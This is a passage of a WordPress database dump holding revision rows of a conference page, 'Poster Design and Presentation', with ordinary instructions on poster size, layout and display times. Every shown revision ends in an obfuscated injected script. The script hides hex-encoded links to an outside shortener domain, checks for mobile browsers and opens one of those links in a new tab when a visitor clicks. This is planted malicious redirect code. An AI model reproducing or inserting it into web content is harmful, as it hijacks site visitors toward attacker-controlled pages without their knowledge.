os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Poster Design and Presentation','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 21:02:46','2023-08-13 21:02:46','',5132,'https://gsw2023.com/?p=5170',0,'revision','',0),
(5171,1,'2023-08-13 21:03:33','2023-08-13 21:03:33','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program\r\nPlease remove your poster after 17:30 hours.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Poster Design and Presentation','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 21:03:33','2023-08-13 21:03:33','',5132,'https://gsw2023.com/?p=5171',0,'revision','',0),
(5172,1,'2023-08-13 21:04:17','2023-08-13 21:04:17','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 